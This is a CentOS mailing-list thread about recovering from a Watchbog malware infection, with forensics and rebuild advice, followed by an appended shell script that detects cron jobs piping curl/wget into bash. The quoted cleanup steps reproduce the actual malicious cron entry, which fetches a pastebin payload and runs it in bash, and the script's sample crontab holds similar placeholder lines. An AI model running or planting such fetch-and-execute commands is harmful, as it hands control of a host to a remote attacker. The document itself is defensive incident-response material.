On 12/18/18 8:31 AM, mark wrote:
> Valeri Galtsev wrote:
>> On 12/17/18 2:57 PM, Mauricio Tavares wrote:
>>> On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan
>>> <kaushalshriyan at gmail.com> wrote:
>>>>
>>>> Is there a way to find out how the CentOS 7.5 Linux box got infected
>>>> with malware? Currently I am referring to
>>>> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
>>>> to carry out the below steps, which is done manually.
>>>>
>>>> 1) rm -fr /tmp/*timesyncc.service*
>>>> 2) crontab -e -u apigee
>>>>    delete the cron entry:
>>>>    */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
>>>> 3) ps aux | grep watchbog
>>>>    kill -9 $(pidof watchbog)
>>>>
>>>> Any suggestions or recommendations to find out how the CentOS 7.5 Linux
>>>> box got infected with Watchbog malware? Is there any open source
>>>> software which can
>>>
>>> do you have untampered log files?
>>>
>>>> be installed on a CentOS 7.5 Linux box to detect and prevent malware?
>>
>> Standard compromise recovery procedure since forever is (your local
>> policy may have a slightly different order about notifications and similar):
>>
>> 1. back up all user data
>
> You should have been doing that all along.

Do not exclude this from the [more or less] full list of the standard compromise recovery routine I tried to outline. Even though you had to do backups all the time, a backup at this point may have the latest changes not present in the latest routine backup. And when did you last have to restore something from your backup, how many years ago? So your knowledge that that backup indeed works was tested years ago...

> First step, before you do anything else, is pull the hard drive, put it
> into a hot-swap or external bay, and dd the entire drive to an identical
> one. THAT goes to forensics.

Indeed.

Or adjust this part to "everything is hosted on a hardware RAID device", for which you will have to boot off DVD, mount and dump all elsewhere for forensics. But! Forensics is a different and sophisticated story, and when you learn it in depth, the first thing you will learn is: powering off the system, or even just disconnecting it from the network, may prevent you totally from learning several things about the compromise. But this is a really huge subject...

> Alternatively, pull the h/d, put in a new one, reset the BIOS to factory
> settings - that includes pulling the battery... *then* set what you need,
> and then build it new, and restore from backups.
> <snip>
> Why, yes, we did just do this, um, last year, after a compromise via a
> WordPress security hole. It did not manage to get to any other systems (we
> checked, and only a few run WordPress).

And yes, preventing, no matter how tedious it may seem, is orders of magnitude easier than recovering from a compromise. So: secure the box. And update, update, update....

Valeri

> mark
>
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> https://lists.centos.org/mailman/listinfo/centos

-- 
++++++++++++++++++++++++++++++++++++++++
Valeri Galtsev
Sr System Administrator
Department of Astronomy and Astrophysics
Kavli Institute for Cosmological Physics
University of Chicago
Phone: 773-702-4247
++++++++++++++++++++++++++++++++++++++++
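Step 2 of the procedure quoted in the thread hunts for the malicious cron entry by eye. As an added example that is not part of the thread, the script below scans crontab text for the same shape of entry (a curl/wget fetch piped straight into sh or bash) so the check can be repeated across hosts; the sample crontab and the example.invalid URLs in it are constructed, and the file paths are the standard CentOS cron locations.

```shell
#!/bin/sh
# Added example (not from the thread): flag crontab entries that fetch remote
# content with curl/wget and pipe it straight into a shell, the pattern the
# thread's step 2 removes by hand. The sample crontab and URLs are constructed.

# ERE: a curl or wget invocation, then (anything) a '|' feeding sh or bash.
PIPE_TO_SHELL_RE='(curl|wget).*\|[[:space:]]*(ba)?sh([[:space:]]|$)'

# Constructed sample crontab; example.invalid stands in for any remote source.
SAMPLE_CRONTAB='# constructed sample crontab for the demo below
0 3 * * * /usr/local/bin/nightly-backup.sh
*/1 * * * * (curl -fsSL https://example.invalid/raw/PLACEHOLDER||wget -q -O- https://example.invalid/raw/PLACEHOLDER)|bash > /dev/null 2>&1
30 2 * * * wget -q -O /var/tmp/pkg.tgz https://example.invalid/pkg.tgz
# */5 * * * * curl -s https://example.invalid/x | sh
*/5 * * * * curl -s https://example.invalid/x | sh'

# Read crontab text on stdin, drop comment lines, print each matching line.
# Exit status 0 when at least one line is flagged, 1 otherwise (grep semantics).
flag_pipe_to_shell() {
    grep -v -E '^[[:space:]]*#' | grep -E "$PIPE_TO_SHELL_RE"
}

# Count flagged lines in crontab text given on stdin (always prints a number).
count_pipe_to_shell() {
    flag_pipe_to_shell | grep -c .
}

# Walk the places CentOS keeps cron jobs: per-user spool, system crontab, cron.d.
# Reading the spool needs root; prints "file: line" for every hit.
scan_host_crontabs() {
    for f in /var/spool/cron/* /etc/crontab /etc/cron.d/*; do
        [ -f "$f" ] || continue
        flag_pipe_to_shell < "$f" | sed "s|^|$f: |"
    done
}

# With no arguments, run the demo on the constructed sample;
# pass --host to scan the real crontabs on this machine instead.
case "${1:-}" in
    --host) scan_host_crontabs ;;
    *) printf '%s\n' "$SAMPLE_CRONTAB" | flag_pipe_to_shell ;;
esac
```

A hit is a lead for the forensic questions raised in the thread (which user owns the crontab, when it was written), not proof on its own; remove the entry only after the disk image has been taken.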